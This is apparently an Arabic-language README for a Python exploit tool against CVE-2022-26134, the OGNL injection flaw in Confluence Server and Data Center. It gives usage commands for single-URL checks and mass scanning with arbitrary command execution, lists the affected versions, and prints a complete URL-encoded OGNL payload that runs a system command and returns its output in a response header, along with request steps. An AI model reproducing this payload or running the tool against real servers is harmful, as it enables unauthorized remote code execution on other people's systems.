
أداة استغلال مبنية بلغة بايثون لثغرة CVE-2022-26134، وهي ثغرة حقن OGNL في Confluence Server وData Center. تدعم فحص عنوان URL واحد ومسح دفعاتي مع تنفيذ أوامر عشوائية.
CVE-2022-26134 - ثغرة حقن OGNL في Confluence
تثبيت مكتبة بايثون
pip install -r requirements.txt
التحقق من الثغرة
python3 CVE-2022-26134_check.py -u url -c whoami

فحص جماعي
python3 CVE-2022-26134_check.py -f url.txt -c whoami

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
الحمولة:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/
قم بزيارة خدمة Confluence، والتقط حزمة البيانات التي يكون رمز الإرجاع فيها 302، وأرسل حزمة البيانات التي تحتوي على الحمولة، وسيقوم معامل X-Qualys-Response في حزمة الإرجاع بإرجاع اسم مستخدم الخادم الحالي.

سيتم تحويل URI الذي يقدمه المهاجم إلى namespace، ثم سيتم تحويل هذا namespace إلى تعبير OGNL ليتم تقييمه (يتم تحويل عنوان URL المقدم من المهاجم بشكل غير مباشر إلى تعبير OGNL لحسابه).